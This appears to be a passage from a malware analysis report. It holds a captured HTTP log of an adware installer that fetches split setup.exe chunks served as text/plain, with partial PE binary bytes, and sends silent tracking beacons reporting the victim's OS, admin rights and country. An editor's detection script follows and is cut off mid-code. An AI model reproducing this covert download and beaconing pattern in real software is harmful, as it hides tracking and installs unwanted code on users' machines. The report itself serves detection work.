Date: Thu, 05 Mar 2015 23:24:13 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_b HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461993"
Last-Modified: Wed, 04 Mar 2015 09:39:53 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds006.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds027.dc1.c,1425597835.cds006.fr7.pr
..................S....<bS.d.,.......#.....\.9....=`...az.a.Ne.....I.Z..%.~....Ea5..P.q..;.<..,U.Y...kjO... 3o......-(..0...ll..;[.-....46....o...w03....]|T:{u.....Q.Q....bz.......=...S?q....f1-:T..%.%cLo*C4.l..!.fq..Tc....X".X..ME..!..#B7.z.`e.*{.I.~\.J.0......n..d......'^.(......ab...=.YF.\........... ........p..g..?._.._......]}.`..j.h...L..q.c=......5..I..r1Vt.^.g.' ...}.z.......h>..@"._z..5..<.E<.}.R..ib.p..../T.e.B.k...%.6.5:.>..r.[F@..[...w..u..=..D....4<Z6.....Kd.b..@Q.ku.i.).{~^.r3.....#k.J.........B{....k...K.......}.`.L~....Dt.E../..*J.....z......Z..n.V.....Na...x.R.m~N....=..YU..... ........%Q..~..mG@.w>.j......p.GZ../.D.T.RY..... .R..fPx.....T.......4;...\I..R.wH..3oj....k...9.3L\..Z....J..c...Mj.P@'...1.. ......QV......H@UB....A.E\...v..2..[?..w.a.e.ob..Oh...h...Q..9R.......g..<.....3.!.O.&(....4_..........2%..p..N.E..]Z.\.O..q...0.8...G.6;.9].....s.......F|...g.B.\2.#..h?........D.<..P9J.........P..SO"T.....t....#....v.r.....,>5..W...W... .w...[_..{Q...h......r..9..j.*...<WVH.cZ..9&..........b.IS.,.2..!.QE.W?._..5..0v..1....cY.....V..X....=.`.t.....nQg.1[...<.9:.....2a$.'.1.EZ.?.,..1..~..}........B.MN.]r.........V.j5S...Et...H.n..v.k.J.X.j....x.A.......:.......r...}.........J=./..b..../D........-. W%z.c.1U*4...?.y...CuV.ST.x.A...$...p..)...v.....V...JF$.;...;AhW._"n......za....C@D......jF.~.Z..!V..~...I....y..........266.L...D<s..Z..P5}.a..rH.#..}.U.......*...;q-B.de.\4..[....r>...i.p.....(......&..o...A.yr.9....p...1.b............FW#...o.......F.Sq..
<<< skipped >>>
GET /utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_a HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461991"
Last-Modified: Wed, 04 Mar 2015 09:39:51 GMT
Cache-Control: max-age=2511
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop010.fr7.t,1425597835.cds002.fr7.sr,1425597835.dop010.dc1.r,1425597835.cds014.dc1.c,1425597835.cds002.fr7.pr
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@........................................... ..............................p.......................................................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...@....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:06 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /outil/fuully/styi2/setup.exe_d HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461998"
Last-Modified: Wed, 04 Mar 2015 09:39:58 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop008.fr7.t,1425597835.cds027.fr7.sr,1425597835.dop004.dc1.r,1425597835.cds018.dc1.c,1425597835.cds027.fr7.pr
.b....:-.\....K........J..n<.....U5r.96_.Gd..~.q...ki..z_<.........LzcF.....q4..c.#.0E..\.O...p:LM...".0H.....6![:%..r..Z.{(.....x.....a..Mo.s.BW...3.E>..=c.*.n=.....%.s.V......t7y.|....FF....9z......{z...:3.. ;Z.G..a.Q..Oe..........G.e..m...v.:^.M30..-.....c.>jo,TR.^.....m.Vb....%.z.........Dp.DE.............U....q..&.......D..o$.EC.#E....*.. ..N.u.K.5.z..\.".I._.....up..:9..Y..B0.i...9kF.q...pc....\(v.,.r...^z.7(.o..D..}...I..mT..X.R.s.....f...:..*R2bk..T0r0.....,....O......x.F....i.Q....,..9:;o.&...s...'Z...X..3.}.K..Ox!~..VQ...*.....@.... 4.#}[...J...J...*........N.4.\A..~_.b...A......V..`..6xdH....B..A..]...VY....4Y,...~.,...A.....f..R....<N..G.OxJF...e....Y...]W...|.1......<....]......J....v...^>X,...}v..rN;...i..0........>..].......:3...E.. .....[....?.!a.3.$.C.b..N...7.........L.k/m.....kw'...No"jD..y...0..d.@..>.iM&.W...A.Y....B.......^..U .jw....J...-M.......(..|....m..|-.....8.p. .{.g..i(.....~R.].:.Bl.bW.\GK1zY..3A..O....jc.I:...5....5........1.....Q>na..lGRDy..<.29.(....5Y...<.~.f.z....."..a...&.{....B.....B....u.6...B.[..$.1...v...8}n.....:..*A..x......Zy.........M"k......L=|..E....].....&k{..k.S..~...R3.w..I.....3...Y./..s.E..>.......... ."...f..v.W..P.........GyLvwM5._..,B.BV.\.{C(....h.c..........."..9....8.;..^.L.S...8c.d.AN..S.|$..%>Z]..5.TS}.A.F...s.O......>....)......}2.M<#m........J.m...).X.Yl."M.U..2p... )LT.F........&6%. .K..H.q.c.....ww...$...?|..74 FP$........{..-.........E.i...CYh.h...Z..UK.....[............D...kV]...gS...&R4..m..&.U..w4
<<< skipped >>>
GET /utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 9Tcz6Ap2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy
x-amz-request-id: A16DE0E2CD020B49
Date: Thu, 05 Mar 2015 23:24:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: hRdx8sPtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M
x-amz-request-id: 28EEC20B1021BA7F
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: dHcCGtITcro3krS3zzCUBB/PyBJcOmeanAIOwt1zjHpRd EhrSMar7sNev tM0Zs
x-amz-request-id: 217FED2A048E8812
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x
x-amz-request-id: D9B49812856D47D8
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF
x-amz-request-id: 0326DD6CDACB1E14
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: pA/BMrf6nnbcsXt9aUrjBMJXCjMg/rYN0bREwFw2IFJjiNAFiGowVVRm08n4cTXj
x-amz-request-id: 782D1254A2753524
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tu J10nP 3UiJjMiersLzKMfUM//adluDe3txSAwe0xiPcLPCBY5gbiIfcRIhUyJ
x-amz-request-id: 856775D186715B3E
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: c7R66s0PbI6RE2OyTOiCC/kkDREmnq8XI9Rrb31NiEInzxWmSTj6svYElmM6GGW3
x-amz-request-id: EEA240B973A1ED0B
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jf4p2TpI1QvS4utE gh41cCrCUXngSXk9kIDTep6JbEcK98dPVUaxRXECXnpLHcC
x-amz-request-id: FBE2853165EBC225
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vncs5DFxlxNe5vB3cTxcHPuo4uYeUPMRYUmU2TsEieD4MwiL4d6lbiXiNTtRveSD
x-amz-request-id: 324E8B4267AD49B1
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: T31DEGAF6h4dLzhlC422YM7O0Gl5KZ7sCd1d6z6yoij0mBcnDMp3bJk9sLrV/JT3
x-amz-request-id: BF691D9E6E248501
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ttgnYaHLNdphi3cl2cTDyuw3wDrD9mFYxXExz2wOsce4Qf2LLcxOb9L72gQsFkhv
x-amz-request-id: C667B0063F2F2E11
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i
x-amz-request-id: 535D90B37079E09D
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: GjC3mnbWhImS6Wr09zk2cotmx45tUhke1isOX 7XHJNlTycAlHMdwhOd7bFM4b6K
x-amz-request-id: ED30DA0F391DC5A2
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK
x-amz-request-id: 8EA97A25493FB8FC
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB
x-amz-request-id: C7467C452F157333
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vgIRq9xlWi7A2OtBmXsJCbotmSTVr5MK1z v0sz8o3fTTfSeKrYM1GfS4qpBlv w
x-amz-request-id: 3CBC5AFF8D68D5F6
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u8LTwYQJKffKricroarszKXJRYq9a3kbqfiiuvLg3 TDit7DU3UnBq7Kkmq7saVP
x-amz-request-id: 338D1C02DC56E30B
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:09 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:55 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_c HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461996"
Last-Modified: Wed, 04 Mar 2015 09:39:56 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop012.fr7.t,1425597835.cds019.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds002.dc1.c,1425597835.cds019.fr7.pr
[binary response body: the report renders the start of the 2530652-byte download as non-printable bytes; the first bytes are not the MZ signature of a PE file, so the body is not a plain executable as served]
<<< skipped >>>
GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:59 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
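The exchanges above follow one pattern. Every request except one is a GET for a .gif whose query string carries the installer's telemetry (action=started, action=finished, action=install, report=fdata, together with install-wide identifiers such as bic, upi, verifier, srcid, app and crtnm), and every such request is answered by a 35- or 43-byte GIF89a with Expires: Mon, 26 Jul 1997 and Cache-Control: no-cache, must-revalidate, i.e. an uncacheable tracking pixel: the body carries nothing, the query string is the message. The one exception fetches /outil/fuully/styi2/setup.exe_c from dl.ourgenstatsstorage.com, 2530652 bytes declared as text/plain. The script below is an added example written by the editor, not part of the Lavasoft report or of the sample itself: it parses abridged copies of those request lines, separates beacons from the payload fetch, extracts the identifiers that stay constant across beacons, and emits a Suricata rule for the download. The identity-key list, the size thresholds and the Suricata sid are assumptions.

```python
"""Indicator extraction over the HTTP exchanges captured above.

Added example (editor's code, not part of the Lavasoft MAS report). The
sample records are abridged copies of request lines and response headers
from the capture; the classification rules, thresholds and the Suricata
sid are the editor's assumptions.
"""
from urllib.parse import parse_qs

# Constructed sample: (request line, Host header, response Content-Type,
# response Content-Length), abridged from the capture above.
CAPTURE = [
    ("GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1",
     "errors.ourinputdatastorage.com", "image/gif", 35),
    ("GET /installer.gif?action=started&app=69829&ver=1_36_01_22"
     "&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b"
     "&upi=13b4b43ecfec3569c696888aa234740e&srcid=001504&silent=1&os=XP32"
     "&osprod=Microsoft Windows XP&ossp=Service Pack 3&admin=1&crtnm=BlondieProject"
     "&rnd=1425597847 HTTP/1.1",
     "stats.ourinputdatastorage.com", "image/gif", 35),
    ("GET /installer.gif?action=finished&app=69829&ver=1_36_01_22"
     "&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b"
     "&upi=13b4b43ecfec3569c696888aa234740e&srcid=001504&silent=1&os=XP32"
     "&admin=1&crtnm=BlondieProject&rnd=1425597852 HTTP/1.1",
     "stats.ourinputdatastorage.com", "image/gif", 35),
    ("GET /apps.gif?action=install&app=69829&upi=13b4b43ecfec3569c696888aa234740e"
     "&srcid=001504&installtime=1425597843&silent=1&crtnm=BlondieProject&rnd=1425597852 HTTP/1.1",
     "stats.ourinputdatastorage.com", "image/gif", 35),
    ("GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1",
     "errors.crossrider.com", "image/gif", 43),
    ("GET /outil/fuully/styi2/setup.exe_c HTTP/1.1",
     "dl.ourgenstatsstorage.com", "text/plain", 2530652),
]

# Query keys that identify the install rather than the event (assumption:
# their values repeat unchanged across the beacons in the capture).
IDENTITY_KEYS = ("bic", "upi", "verifier", "procid", "srcid", "app", "crtnm")


def parse_request(line, host):
    """Split a request line into method, path and decoded query parameters.

    The target is everything between the method and the version, because this
    installer sends unencoded spaces in its query string
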